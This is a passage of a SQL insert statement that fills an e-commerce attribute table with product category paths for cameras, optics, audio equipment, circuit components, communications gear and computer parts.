(1162, 1162, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > On-Camera Monitors'),
(1163, 1163, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Surveillance Camera Accessories'),
(1164, 1164, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Underwater Camera Housing Accessories'),
(1165, 1165, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Underwater Camera Housings'),
(1166, 1166, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Video Camera Lights'),
(1167, 1167, 0, 'Cameras & Optics > Camera & Optic Accessories > Optic Accessories'),
(1168, 1168, 0, 'Cameras & Optics > Camera & Optic Accessories > Optic Accessories > Binocular & Monocular Accessories'),
(1169, 1169, 0, 'Cameras & Optics > Camera & Optic Accessories > Optic Accessories > Optics Bags & Cases'),
(1170, 1170, 0, 'Cameras & Optics > Camera & Optic Accessories > Optic Accessories > Rangefinder Accessories'),
(1171, 1171, 0, 'Cameras & Optics > Camera & Optic Accessories > Optic Accessories > Spotting Scope Accessories'),
(1172, 1172, 0, 'Cameras & Optics > Camera & Optic Accessories > Optic Accessories > Telescope Accessories'),
(1173, 1173, 0, 'Cameras & Optics > Camera & Optic Accessories > Optic Accessories > Thermal Optic Accessories'),
(1174, 1174, 0, 'Cameras & Optics > Camera & Optic Accessories > Optic Accessories > Weapon Scope & Sight Accessories'),
(1175, 1175, 0, 'Cameras & Optics > Camera & Optic Accessories > Tripod & Monopod Accessories'),
(1176, 1176, 0, 'Cameras & Optics > Camera & Optic Accessories > Tripod & Monopod Accessories > Tripod & Monopod Cases'),
(1177, 1177, 0, 'Cameras & Optics > Camera & Optic Accessories > Tripod & Monopod Accessories > Tripod & Monopod Heads'),
(1178, 1178, 0, 'Cameras & Optics > Camera & Optic Accessories > Tripod & Monopod Accessories > Tripod Collars & Mounts'),
(1179, 1179, 0, 'Cameras & Optics > Camera & Optic Accessories > Tripod & Monopod Accessories > Tripod Handles'),
(1180, 1180, 0, 'Cameras & Optics > Camera & Optic Accessories > Tripod & Monopod Accessories > Tripod Spreaders'),
(1181, 1181, 0, 'Cameras & Optics > Camera & Optic Accessories > Tripods & Monopods'),
(1182, 1182, 0, 'Cameras & Optics > Cameras'),
(1183, 1183, 0, 'Cameras & Optics > Cameras > Borescopes'),
(1184, 1184, 0, 'Cameras & Optics > Cameras > Digital Cameras'),
(1185, 1185, 0, 'Cameras & Optics > Cameras > Disposable Cameras'),
(1186, 1186, 0, 'Cameras & Optics > Cameras > Film Cameras'),
(1187, 1187, 0, 'Cameras & Optics > Cameras > Surveillance Cameras'),
(1188, 1188, 0, 'Cameras & Optics > Cameras > Trail Cameras'),
(1189, 1189, 0, 'Cameras & Optics > Cameras > Video Cameras'),
(1190, 1190, 0, 'Cameras & Optics > Cameras > Webcams'),
(1191, 1191, 0, 'Cameras & Optics > Optics'),
(1192, 1192, 0, 'Cameras & Optics > Optics > Binoculars'),
(1193, 1193, 0, 'Cameras & Optics > Optics > Monoculars'),
(1194, 1194, 0, 'Cameras & Optics > Optics > Rangefinders'),
(1195, 1195, 0, 'Cameras & Optics > Optics > Scopes'),
(1196, 1196, 0, 'Cameras & Optics > Optics > Scopes > Spotting Scopes'),
(1197, 1197, 0, 'Cameras & Optics > Optics > Scopes > Telescopes'),
(1198, 1198, 0, 'Cameras & Optics > Optics > Scopes > Weapon Scopes & Sights'),
(1199, 1199, 0, 'Cameras & Optics > Photography'),
(1200, 1200, 0, 'Cameras & Optics > Photography > Darkroom'),
(1201, 1201, 0, 'Cameras & Optics > Photography > Darkroom > Developing & Processing Equipment'),
(1202, 1202, 0, 'Cameras & Optics > Photography > Darkroom > Developing & Processing Equipment > Copystands'),
(1203, 1203, 0, 'Cameras & Optics > Photography > Darkroom > Developing & Processing Equipment > Darkroom Sinks'),
(1204, 1204, 0, 'Cameras & Optics > Photography > Darkroom > Developing & Processing Equipment > Developing Tanks & Reels'),
(1205, 1205, 0, 'Cameras & Optics > Photography > Darkroom > Developing & Processing Equipment > Print Trays, Washers & Dryers'),
(1206, 1206, 0, 'Cameras & Optics > Photography > Darkroom > Developing & Processing Equipment > Retouching Equipment & Supplies'),
(1207, 1207, 0, 'Cameras & Optics > Photography > Darkroom > Enlarging Equipment'),
(1208, 1208, 0, 'Cameras & Optics > Photography > Darkroom > Enlarging Equipment > Darkroom Easels'),
(1209, 1209, 0, 'Cameras & Optics > Photography > Darkroom > Enlarging Equipment > Darkroom Timers'),
(1210, 1210, 0, 'Cameras & Optics > Photography > Darkroom > Enlarging Equipment > Focusing Aids'),
(1211, 1211, 0, 'Cameras & Optics > Photography > Darkroom > Enlarging Equipment > Photographic Analyzers'),
(1212, 1212, 0, 'Cameras & Optics > Photography > Darkroom > Enlarging Equipment > Photographic Enlargers'),
(1213, 1213, 0, 'Cameras & Optics > Photography > Darkroom > Photographic Chemicals'),
(1214, 1214, 0, 'Cameras & Optics > Photography > Darkroom > Photographic Paper'),
(1215, 1215, 0, 'Cameras & Optics > Photography > Darkroom > Safelights'),
(1216, 1216, 0, 'Cameras & Optics > Photography > Lighting & Studio'),
(1217, 1217, 0, 'Cameras & Optics > Photography > Lighting & Studio > Light Meter Accessories'),
(1218, 1218, 0, 'Cameras & Optics > Photography > Lighting & Studio > Light Meters'),
(1219, 1219, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Backgrounds'),
(1220, 1220, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Light & Flash Accessories'),
(1221, 1221, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Lighting Controls'),
(1222, 1222, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Lighting Controls > Flash Diffusers'),
(1223, 1223, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Lighting Controls > Flash Reflectors'),
(1224, 1224, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Lighting Controls > Lighting Filters & Gobos'),
(1225, 1225, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Lighting Controls > Softboxes'),
(1226, 1226, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Lights & Flashes'),
(1227, 1227, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Stand & Mount Accessories'),
(1228, 1228, 0, 'Cameras & Optics > Photography > Lighting & Studio > Studio Stands & Mounts'),
(1229, 1229, 0, 'Cameras & Optics > Photography > Photo Mounting Supplies'),
(1230, 1230, 0, 'Cameras & Optics > Photography > Photo Negative & Slide Storage'),
(1231, 1231, 0, 'Electronics'),
(1232, 1232, 0, 'Electronics > Arcade Equipment'),
(1233, 1233, 0, 'Electronics > Arcade Equipment > Basketball Arcade Games'),
(1234, 1234, 0, 'Electronics > Arcade Equipment > Pinball Machine Accessories'),
(1235, 1235, 0, 'Electronics > Arcade Equipment > Pinball Machines'),
(1236, 1236, 0, 'Electronics > Arcade Equipment > Skee-Ball Machines'),
(1237, 1237, 0, 'Electronics > Arcade Equipment > Video Game Arcade Cabinet Accessories'),
(1238, 1238, 0, 'Electronics > Arcade Equipment > Video Game Arcade Cabinets'),
(1239, 1239, 0, 'Electronics > Audio'),
(1240, 1240, 0, 'Electronics > Audio > Audio Accessories'),
(1241, 1241, 0, 'Electronics > Audio > Audio Accessories > Audio & Video Receiver Accessories'),
(1242, 1242, 0, 'Electronics > Audio > Audio Accessories > Headphone & Headset Accessories'),
(1243, 1243, 0, 'Electronics > Audio > Audio Accessories > Headphone & Headset Accessories > Headphone Cushions & Tips'),
(1244, 1244, 0, 'Electronics > Audio > Audio Accessories > Karaoke System Accessories'),
(1245, 1245, 0, 'Electronics > Audio > Audio Accessories > Karaoke System Accessories > Karaoke Chips'),
(1246, 1246, 0, 'Electronics > Audio > Audio Accessories > MP3 Player Accessories'),
(1247, 1247, 0, 'Electronics > Audio > Audio Accessories > MP3 Player Accessories > MP3 Player & Mobile Phone Accessory Sets'),
(1248, 1248, 0, 'Electronics > Audio > Audio Accessories > MP3 Player Accessories > MP3 Player Cases'),
(1249, 1249, 0, 'Electronics > Audio > Audio Accessories > Microphone Accessories'),
(1250, 1250, 0, 'Electronics > Audio > Audio Accessories > Microphone Stands'),
(1251, 1251, 0, 'Electronics > Audio > Audio Accessories > Satellite Radio Accessories'),
(1252, 1252, 0, 'Electronics > Audio > Audio Accessories > Speaker Accessories'),
(1253, 1253, 0, 'Electronics > Audio > Audio Accessories > Speaker Accessories > Speaker Bags, Covers & Cases'),
(1254, 1254, 0, 'Electronics > Audio > Audio Accessories > Speaker Accessories > Speaker Components & Kits'),
(1255, 1255, 0, 'Electronics > Audio > Audio Accessories > Speaker Accessories > Speaker Stand Bags'),
(1256, 1256, 0, 'Electronics > Audio > Audio Accessories > Speaker Accessories > Speaker Stands & Mounts'),
(1257, 1257, 0, 'Electronics > Audio > Audio Accessories > Speaker Accessories > Tactile Transducers'),
(1258, 1258, 0, 'Electronics > Audio > Audio Accessories > Turntable Accessories'),
(1259, 1259, 0, 'Electronics > Audio > Audio Components'),
(1260, 1260, 0, 'Electronics > Audio > Audio Components > Audio & Video Receivers'),
(1261, 1261, 0, 'Electronics > Audio > Audio Components > Audio Amplifiers'),
(1262, 1262, 0, 'Electronics > Audio > Audio Components > Audio Amplifiers > Headphone Amplifiers'),
(1263, 1263, 0, 'Electronics > Audio > Audio Components > Audio Amplifiers > Power Amplifiers'),
(1264, 1264, 0, 'Electronics > Audio > Audio Components > Audio Mixers'),
(1265, 1265, 0, 'Electronics > Audio > Audio Components > Audio Transmitters'),
(1266, 1266, 0, 'Electronics > Audio > Audio Components > Audio Transmitters > Bluetooth Transmitters'),
(1267, 1267, 0, 'Electronics > Audio > Audio Components > Audio Transmitters > FM Transmitters'),
(1268, 1268, 0, 'Electronics > Audio > Audio Components > Channel Strips'),
(1269, 1269, 0, 'Electronics > Audio > Audio Components > Direct Boxes'),
(1270, 1270, 0, 'Electronics > Audio > Audio Components > Headphones & Headsets'),
(1271, 1271, 0, 'Electronics > Audio > Audio Components > Microphones'),
(1272, 1272, 0, 'Electronics > Audio > Audio Components > Signal Processors'),
(1273, 1273, 0, 'Electronics > Audio > Audio Components > Signal Processors > Crossovers'),
(1274, 1274, 0, 'Electronics > Audio > Audio Components > Signal Processors > Effects Processors'),
(1275, 1275, 0, 'Electronics > Audio > Audio Components > Signal Processors > Equalizers'),
(1276, 1276, 0, 'Electronics > Audio > Audio Components > Signal Processors > Loudspeaker Management Systems'),
(1277, 1277, 0, 'Electronics > Audio > Audio Components > Signal Processors > Microphone Preamps'),
(1278, 1278, 0, 'Electronics > Audio > Audio Components > Signal Processors > Noise Gates & Compressors'),
(1279, 1279, 0, 'Electronics > Audio > Audio Components > Signal Processors > Phono Preamps'),
(1280, 1280, 0, 'Electronics > Audio > Audio Components > Speakers'),
(1281, 1281, 0, 'Electronics > Audio > Audio Components > Studio Recording Bundles'),
(1282, 1282, 0, 'Electronics > Audio > Audio Players & Recorders'),
(1283, 1283, 0, 'Electronics > Audio > Audio Players & Recorders > Boomboxes'),
(1284, 1284, 0, 'Electronics > Audio > Audio Players & Recorders > CD Players & Recorders'),
(1285, 1285, 0, 'Electronics > Audio > Audio Players & Recorders > Cassette Players & Recorders'),
(1286, 1286, 0, 'Electronics > Audio > Audio Players & Recorders > Home Theater Systems'),
(1287, 1287, 0, 'Electronics > Audio > Audio Players & Recorders > Jukeboxes'),
(1288, 1288, 0, 'Electronics > Audio > Audio Players & Recorders > Karaoke Systems'),
(1289, 1289, 0, 'Electronics > Audio > Audio Players & Recorders > MP3 Players'),
(1290, 1290, 0, 'Electronics > Audio > Audio Players & Recorders > MiniDisc Players & Recorders'),
(1291, 1291, 0, 'Electronics > Audio > Audio Players & Recorders > Multitrack Recorders'),
(1292, 1292, 0, 'Electronics > Audio > Audio Players & Recorders > Radios'),
(1293, 1293, 0, 'Electronics > Audio > Audio Players & Recorders > Reel-to-Reel Tape Players & Recorders'),
(1294, 1294, 0, 'Electronics > Audio > Audio Players & Recorders > Stereo Systems'),
(1295, 1295, 0, 'Electronics > Audio > Audio Players & Recorders > Turntables & Record Players'),
(1296, 1296, 0, 'Electronics > Audio > Audio Players & Recorders > Voice Recorders'),
(1297, 1297, 0, 'Electronics > Audio > Bullhorns'),
(1298, 1298, 0, 'Electronics > Audio > DJ & Specialty Audio'),
(1299, 1299, 0, 'Electronics > Audio > DJ & Specialty Audio > DJ CD Players'),
(1300, 1300, 0, 'Electronics > Audio > DJ & Specialty Audio > DJ Systems'),
(1301, 1301, 0, 'Electronics > Audio > Public Address Systems'),
(1302, 1302, 0, 'Electronics > Audio > Stage Equipment'),
(1303, 1303, 0, 'Electronics > Audio > Stage Equipment > Wireless Transmitters'),
(1304, 1304, 0, 'Electronics > Circuit Boards & Components'),
(1305, 1305, 0, 'Electronics > Circuit Boards & Components > Circuit Board Accessories'),
(1306, 1306, 0, 'Electronics > Circuit Boards & Components > Circuit Decoders & Encoders'),
(1307, 1307, 0, 'Electronics > Circuit Boards & Components > Circuit Prototyping'),
(1308, 1308, 0, 'Electronics > Circuit Boards & Components > Circuit Prototyping > Breadboards'),
(1309, 1309, 0, 'Electronics > Circuit Boards & Components > Electronic Filters'),
(1310, 1310, 0, 'Electronics > Circuit Boards & Components > Passive Circuit Components'),
(1311, 1311, 0, 'Electronics > Circuit Boards & Components > Passive Circuit Components > Capacitors'),
(1312, 1312, 0, 'Electronics > Circuit Boards & Components > Passive Circuit Components > Electronic Oscillators'),
(1313, 1313, 0, 'Electronics > Circuit Boards & Components > Passive Circuit Components > Inductors'),
(1314, 1314, 0, 'Electronics > Circuit Boards & Components > Passive Circuit Components > Resistors'),
(1315, 1315, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards'),
(1316, 1316, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Camera Circuit Boards'),
(1317, 1317, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Computer Circuit Boards'),
(1318, 1318, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Computer Circuit Boards > Computer Inverter Boards'),
(1319, 1319, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Computer Circuit Boards > Hard Drive Circuit Boards'),
(1320, 1320, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Computer Circuit Boards > Motherboards'),
(1321, 1321, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Development Boards'),
(1322, 1322, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Exercise Machine Circuit Boards'),
(1323, 1323, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Household Appliance Circuit Boards'),
(1324, 1324, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Pool & Spa Circuit Boards'),
(1325, 1325, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Printer, Copier, & Fax Machine Circuit Boards'),
(1326, 1326, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Scanner Circuit Boards'),
(1327, 1327, 0, 'Electronics > Circuit Boards & Components > Printed Circuit Boards > Television Circuit Boards'),
(1328, 1328, 0, 'Electronics > Circuit Boards & Components > Semiconductors'),
(1329, 1329, 0, 'Electronics > Circuit Boards & Components > Semiconductors > Diodes'),
(1330, 1330, 0, 'Electronics > Circuit Boards & Components > Semiconductors > Integrated Circuits & Chips'),
(1331, 1331, 0, 'Electronics > Circuit Boards & Components > Semiconductors > Microcontrollers'),
(1332, 1332, 0, 'Electronics > Circuit Boards & Components > Semiconductors > Transistors'),
(1333, 1333, 0, 'Electronics > Communications'),
(1334, 1334, 0, 'Electronics > Communications > Answering Machines'),
(1335, 1335, 0, 'Electronics > Communications > Caller IDs'),
(1336, 1336, 0, 'Electronics > Communications > Communication Radio Accessories'),
(1337, 1337, 0, 'Electronics > Communications > Communication Radios'),
(1338, 1338, 0, 'Electronics > Communications > Communication Radios > CB Radios'),
(1339, 1339, 0, 'Electronics > Communications > Communication Radios > Radio Scanners'),
(1340, 1340, 0, 'Electronics > Communications > Communication Radios > Two-Way Radios'),
(1341, 1341, 0, 'Electronics > Communications > Intercom Accessories'),
(1342, 1342, 0, 'Electronics > Communications > Intercoms'),
(1343, 1343, 0, 'Electronics > Communications > Pagers'),
(1344, 1344, 0, 'Electronics > Communications > Telephony'),
(1345, 1345, 0, 'Electronics > Communications > Telephony > Conference Phones'),
(1346, 1346, 0, 'Electronics > Communications > Telephony > Corded Phones'),
(1347, 1347, 0, 'Electronics > Communications > Telephony > Cordless Phones'),
(1348, 1348, 0, 'Electronics > Communications > Telephony > Mobile Phone Accessories'),
(1349, 1349, 0, 'Electronics > Communications > Telephony > Mobile Phone Accessories > Mobile Phone Camera Accessories'),
(1350, 1350, 0, 'Electronics > Communications > Telephony > Mobile Phone Accessories > Mobile Phone Cases'),
(1351, 1351, 0, 'Electronics > Communications > Telephony > Mobile Phone Accessories > Mobile Phone Charms & Straps'),
(1352, 1352, 0, 'Electronics > Communications > Telephony > Mobile Phone Accessories > Mobile Phone Pre-Paid Cards & SIM Cards'),
(1353, 1353, 0, 'Electronics > Communications > Telephony > Mobile Phone Accessories > Mobile Phone Replacement Parts'),
(1354, 1354, 0, 'Electronics > Communications > Telephony > Mobile Phone Accessories > Mobile Phone Stands'),
(1355, 1355, 0, 'Electronics > Communications > Telephony > Mobile Phone Accessories > SIM Card Ejection Tools'),
(1356, 1356, 0, 'Electronics > Communications > Telephony > Mobile Phones'),
(1357, 1357, 0, 'Electronics > Communications > Telephony > Satellite Phones'),
(1358, 1358, 0, 'Electronics > Communications > Telephony > Telephone Accessories'),
(1359, 1359, 0, 'Electronics > Communications > Telephony > Telephone Accessories > Phone Cards'),
(1360, 1360, 0, 'Electronics > Communications > Video Conferencing'),
(1361, 1361, 0, 'Electronics > Components'),
(1362, 1362, 0, 'Electronics > Components > Accelerometers'),
(1363, 1363, 0, 'Electronics > Components > Converters'),
(1364, 1364, 0, 'Electronics > Components > Converters > Audio Converters'),
(1365, 1365, 0, 'Electronics > Components > Converters > Scan Converters'),
(1366, 1366, 0, 'Electronics > Components > Electronics Component Connectors'),
(1367, 1367, 0, 'Electronics > Components > Modulators'),
(1368, 1368, 0, 'Electronics > Components > Splitters'),
(1369, 1369, 0, 'Electronics > Computers'),
(1370, 1370, 0, 'Electronics > Computers > Barebone Computers'),
(1371, 1371, 0, 'Electronics > Computers > Computer Servers'),
(1372, 1372, 0, 'Electronics > Computers > Desktop Computers'),
(1373, 1373, 0, 'Electronics > Computers > Handheld Devices'),
(1374, 1374, 0, 'Electronics > Computers > Handheld Devices > Data Collectors'),
(1375, 1375, 0, 'Electronics > Computers > Handheld Devices > E-Book Readers'),
(1376, 1376, 0, 'Electronics > Computers > Handheld Devices > PDAs'),
(1377, 1377, 0, 'Electronics > Computers > Interactive Kiosks'),
(1378, 1378, 0, 'Electronics > Computers > Laptops'),
(1379, 1379, 0, 'Electronics > Computers > Smart Glasses'),
(1380, 1380, 0, 'Electronics > Computers > Tablet Computers'),
(1381, 1381, 0, 'Electronics > Computers > Thin & Zero Clients'),
(1382, 1382, 0, 'Electronics > Computers > Touch Table Computers'),
(1383, 1383, 0, 'Electronics > Electronics Accessories'),
(1384, 1384, 0, 'Electronics > Electronics Accessories > Adapters'),
(1385, 1385, 0, 'Electronics > Electronics Accessories > Adapters > Audio & Video Cable Adapters & Couplers'),
(1386, 1386, 0, 'Electronics > Electronics Accessories > Adapters > Memory Card Adapters'),
(1387, 1387, 0, 'Electronics > Electronics Accessories > Adapters > USB Adapters'),
(1388, 1388, 0, 'Electronics > Electronics Accessories > Antenna Accessories'),
(1389, 1389, 0, 'Electronics > Electronics Accessories > Antenna Accessories > Antenna Mounts & Brackets'),
(1390, 1390, 0, 'Electronics > Electronics Accessories > Antenna Accessories > Antenna Rotators'),
(1391, 1391, 0, 'Electronics > Electronics Accessories > Antenna Accessories > Satellite LNBs'),
(1392, 1392, 0, 'Electronics > Electronics Accessories > Antennas'),
(1393, 1393, 0, 'Electronics > Electronics Accessories > Audio & Video Splitters & Switches'),
(1394, 1394, 0, 'Electronics > Electronics Accessories > Audio & Video Splitters & Switches > DVI Splitters & Switches'),
(1395, 1395, 0, 'Electronics > Electronics Accessories > Audio & Video Splitters & Switches > HDMI Splitters & Switches'),
(1396, 1396, 0, 'Electronics > Electronics Accessories > Audio & Video Splitters & Switches > VGA Splitters & Switches'),
(1397, 1397, 0, 'Electronics > Electronics Accessories > Blank Media'),
(1398, 1398, 0, 'Electronics > Electronics Accessories > Cable Management'),
(1399, 1399, 0, 'Electronics > Electronics Accessories > Cable Management > Cable Clips'),
(1400, 1400, 0, 'Electronics > Electronics Accessories > Cable Management > Cable Tie Guns'),
(1401, 1401, 0, 'Electronics > Electronics Accessories > Cable Management > Cable Trays'),
(1402, 1402, 0, 'Electronics > Electronics Accessories > Cable Management > Patch Panels'),
(1403, 1403, 0, 'Electronics > Electronics Accessories > Cable Management > Wire & Cable Identification Markers'),
(1404, 1404, 0, 'Electronics > Electronics Accessories > Cable Management > Wire & Cable Sleeves'),
(1405, 1405, 0, 'Electronics > Electronics Accessories > Cable Management > Wire & Cable Ties'),
(1406, 1406, 0, 'Electronics > Electronics Accessories > Cables'),
(1407, 1407, 0, 'Electronics > Electronics Accessories > Cables > Audio & Video Cables'),
(1408, 1408, 0, 'Electronics > Electronics Accessories > Cables > KVM Cables'),
(1409, 1409, 0, 'Electronics > Electronics Accessories > Cables > Network Cables'),
(1410, 1410, 0, 'Electronics > Electronics Accessories > Cables > Storage & Data Transfer Cables'),
(1411, 1411, 0, 'Electronics > Electronics Accessories > Cables > System & Power Cables'),
(1412, 1412, 0, 'Electronics > Electronics Accessories > Cables > Telephone Cables'),
(1413, 1413, 0, 'Electronics > Electronics Accessories > Computer Accessories'),
(1414, 1414, 0, 'Electronics > Electronics Accessories > Computer Accessories > Computer Accessory Sets'),
(1415, 1415, 0, 'Electronics > Electronics Accessories > Computer Accessories > Computer Covers & Skins'),
(1416, 1416, 0, 'Electronics > Electronics Accessories > Computer Accessories > Computer Risers & Stands'),
(1417, 1417, 0, 'Electronics > Electronics Accessories > Computer Accessories > Handheld Device Accessories'),
(1418, 1418, 0, 'Electronics > Electronics Accessories > Computer Accessories > Handheld Device Accessories > E-Book Reader Accessories'),
(1419, 1419, 0, 'Electronics > Electronics Accessories > Computer Accessories > Handheld Device Accessories > E-Book Reader Accessories > E-Book Reader Cases'),
(1420, 1420, 0, 'Electronics > Electronics Accessories > Computer Accessories > Handheld Device Accessories > PDA Accessories');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(1421, 1421, 0, 'Electronics > Electronics Accessories > Computer Accessories > Handheld Device Accessories > PDA Accessories > PDA Cases'),
(1422, 1422, 0, 'Electronics > Electronics Accessories > Computer Accessories > Keyboard & Mouse Wrist Rests'),
(1423, 1423, 0, 'Electronics > Electronics Accessories > Computer Accessories > Keyboard Trays & Platforms'),
(1424, 1424, 0, 'Electronics > Electronics Accessories > Computer Accessories > Laptop Docking Stations'),
(1425, 1425, 0, 'Electronics > Electronics Accessories > Computer Accessories > Mouse Pads'),
(1426, 1426, 0, 'Electronics > Electronics Accessories > Computer Accessories > Stylus Pen Nibs & Refills'),
(1427, 1427, 0, 'Electronics > Electronics Accessories > Computer Accessories > Stylus Pens'),
(1428, 1428, 0, 'Electronics > Electronics Accessories > Computer Accessories > Tablet Computer Docks & Stands'),
(1429, 1429, 0, 'Electronics > Electronics Accessories > Computer Components'),
(1430, 1430, 0, 'Electronics > Electronics Accessories > Computer Components > Blade Server Enclosures'),
(1431, 1431, 0, 'Electronics > Electronics Accessories > Computer Components > Computer Backplates & I/O Shields'),
(1432, 1432, 0, 'Electronics > Electronics Accessories > Computer Components > Computer Power Supplies'),
(1433, 1433, 0, 'Electronics > Electronics Accessories > Computer Components > Computer Processors'),
(1434, 1434, 0, 'Electronics > Electronics Accessories > Computer Components > Computer Racks & Mounts'),
(1435, 1435, 0, 'Electronics > Electronics Accessories > Computer Components > Computer Starter Kits'),
(1436, 1436, 0, 'Electronics > Electronics Accessories > Computer Components > Computer System Cooling Parts'),
(1437, 1437, 0, 'Electronics > Electronics Accessories > Computer Components > Desktop Computer & Server Cases'),
(1438, 1438, 0, 'Electronics > Electronics Accessories > Computer Components > E-Book Reader Parts'),
(1439, 1439, 0, 'Electronics > Electronics Accessories > Computer Components > E-Book Reader Parts > E-Book Reader Screens & Screen Digitizers'),
(1440, 1440, 0, 'Electronics > Electronics Accessories > Computer Components > I/O Cards & Adapters'),
(1441, 1441, 0, 'Electronics > Electronics Accessories > Computer Components > I/O Cards & Adapters > Audio Cards & Adapters'),
(1442, 1442, 0, 'Electronics > Electronics Accessories > Computer Components > I/O Cards & Adapters > Computer Interface Cards & Adapters'),
(1443, 1443, 0, 'Electronics > Electronics Accessories > Computer Components > I/O Cards & Adapters > Riser Cards'),
(1444, 1444, 0, 'Electronics > Electronics Accessories > Computer Components > I/O Cards & Adapters > TV Tuner Cards & Adapters'),
(1445, 1445, 0, 'Electronics > Electronics Accessories > Computer Components > I/O Cards & Adapters > Video Cards & Adapters'),
(1446, 1446, 0, 'Electronics > Electronics Accessories > Computer Components > Input Device Accessories'),
(1447, 1447, 0, 'Electronics > Electronics Accessories > Computer Components > Input Device Accessories > Barcode Scanner Stands'),
(1448, 1448, 0, 'Electronics > Electronics Accessories > Computer Components > Input Device Accessories > Game Controller Accessories'),
(1449, 1449, 0, 'Electronics > Electronics Accessories > Computer Components > Input Device Accessories > Keyboard Keys & Caps'),
(1450, 1450, 0, 'Electronics > Electronics Accessories > Computer Components > Input Device Accessories > Mice & Trackball Accessories'),
(1451, 1451, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices'),
(1452, 1452, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Barcode Scanners'),
(1453, 1453, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Digital Note Taking Pens'),
(1454, 1454, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Electronic Card Readers'),
(1455, 1455, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Fingerprint Readers'),
(1456, 1456, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Game Controllers'),
(1457, 1457, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Gesture Control Input Devices'),
(1458, 1458, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Graphics Tablets'),
(1459, 1459, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > KVM Switches'),
(1460, 1460, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Keyboards'),
(1461, 1461, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Memory Card Readers'),
(1462, 1462, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Mice & Trackballs'),
(1463, 1463, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Numeric Keypads'),
(1464, 1464, 0, 'Electronics > Electronics Accessories > Computer Components > Input Devices > Touchpads'),
(1465, 1465, 0, 'Electronics > Electronics Accessories > Computer Components > Laptop Parts'),
(1466, 1466, 0, 'Electronics > Electronics Accessories > Computer Components > Laptop Parts > Laptop Hinges'),
(1467, 1467, 0, 'Electronics > Electronics Accessories > Computer Components > Laptop Parts > Laptop Housings & Trim'),
(1468, 1468, 0, 'Electronics > Electronics Accessories > Computer Components > Laptop Parts > Laptop Replacement Cables'),
(1469, 1469, 0, 'Electronics > Electronics Accessories > Computer Components > Laptop Parts > Laptop Replacement Keyboards'),
(1470, 1470, 0, 'Electronics > Electronics Accessories > Computer Components > Laptop Parts > Laptop Replacement Screens'),
(1471, 1471, 0, 'Electronics > Electronics Accessories > Computer Components > Laptop Parts > Laptop Replacement Speakers'),
(1472, 1472, 0, 'Electronics > Electronics Accessories > Computer Components > Laptop Parts > Laptop Screen Digitizers'),
(1473, 1473, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices'),
(1474, 1474, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Disk Duplicators'),
(1475, 1475, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Disk Duplicators > CD/DVD Duplicators'),
(1476, 1476, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Disk Duplicators > Hard Drive Duplicators'),
(1477, 1477, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Disk Duplicators > USB Drive Duplicators'),
(1478, 1478, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Floppy Drives'),
(1479, 1479, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Hard Drive Accessories'),
(1480, 1480, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Hard Drive Accessories > Hard Drive Carrying Cases'),
(1481, 1481, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Hard Drive Accessories > Hard Drive Docks'),
(1482, 1482, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Hard Drive Accessories > Hard Drive Enclosures & Mounts'),
(1483, 1483, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Hard Drive Arrays'),
(1484, 1484, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Hard Drives'),
(1485, 1485, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Network Storage Systems'),
(1486, 1486, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Optical Drives'),
(1487, 1487, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > Tape Drives'),
(1488, 1488, 0, 'Electronics > Electronics Accessories > Computer Components > Storage Devices > USB Flash Drives'),
